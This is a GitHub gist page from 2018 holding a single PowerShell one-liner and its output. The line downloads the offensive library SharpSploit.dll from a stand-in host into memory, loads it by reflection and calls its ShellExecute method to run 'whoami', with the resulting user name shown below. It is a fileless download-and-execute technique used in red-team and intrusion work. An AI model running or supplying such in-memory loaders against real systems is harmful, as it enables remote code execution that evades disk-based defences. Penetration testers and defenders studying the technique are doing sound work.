Skip to content

Instantly share code, notes, and snippets.

@cobbr
Created November 6, 2018 15:47
Show Gist options
  • Save cobbr/700bc5088621aaa99a9fb805725dd0bb to your computer and use it in GitHub Desktop.
Save cobbr/700bc5088621aaa99a9fb805725dd0bb to your computer and use it in GitHub Desktop.
PS > [System.Reflection.Assembly]::Load((new-object net.webclient).DownloadData("https://example.com/SharpSploit.dll").GetType("SharpSploit.Execution.Shell").GetMethod("ShellExecute").Invoke(0, @("whoami", "", "", ""))
desktop-f9dq76g\cobbr
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment